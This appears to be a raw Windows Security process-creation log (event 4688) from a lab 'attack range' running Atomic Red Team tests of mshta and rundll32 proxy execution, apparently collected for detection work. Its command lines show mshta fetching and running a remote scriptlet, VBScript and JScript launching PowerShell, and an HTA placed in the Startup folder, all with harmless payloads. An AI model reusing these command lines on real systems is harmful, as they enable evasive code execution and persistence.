Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497462 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x20 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1a40 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497441 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a40 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x7b8 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta.exe "about:'" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497437 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x7b8 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c "mshta.exe "about:'"" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497346 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1160 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497237 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x8f8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler About -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:20 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103497050 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x178c New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:19 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496832 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x860 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1a38 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:19 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496817 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1b10 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:19 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496801 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a38 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1960 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\mshta.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:17 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496353 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x8c4 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x468 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -file C:\AtomicRedTeam\atomics\T1218.005\src\powershell.ps1 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:17 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496322 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x468 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xd54 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file C:\AtomicRedTeam\atomics\T1218.005\src\powershell.ps1"":close") Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:17 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496282 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1ae4 New Process Name: C:\Windows\System32\calc.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x103c Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\calc.exe" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:16 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496071 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x103c New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x20 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close(); Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:37:16 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103496066 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x20 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 10:16:49 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103971673 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x148c New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x13fc Creator Process Name: C:\Windows\System32\rundll32.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 2be43dd4-e09d-41fb-952b-ecb88bc927a2; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 10:16:49 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103971632 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E4 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0x13fc New Process Name: C:\Windows\System32\rundll32.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x274 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%3Chta:application%3E%3Cscript%20language="JScript"%3Ea=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%202be43dd4-e09d-41fb-952b-ecb88bc927a2;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();%3C/script%3E Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 10:16:41 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103969867 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x468 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xe08 Creator Process Name: C:\Windows\System32\rundll32.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 5135c980-ee68-44be-8c52-308e33caeb33; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 10:16:41 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103969814 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E4 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0xe08 New Process Name: C:\Windows\System32\rundll32.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x274 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%205135c980-ee68-44be-8c52-308e33caeb33;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close(); Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/24/2022 04:11:10 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-host-mhaag-attack-range-791 TaskCategory=Process Creation OpCode=Info RecordNumber=70777353 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0xB50CB Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a24 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xd30 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 072f5916-3250-4463-b9be-2f7c248115e0; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/24/2022 04:10:54 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-host-mhaag-attack-range-791 TaskCategory=Process Creation OpCode=Info RecordNumber=70775993 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0xB50CB Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x17e8 New Process Name: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1200 Creator Process Name: C:\Windows\SysWOW64\mshta.exe Process Command Line: 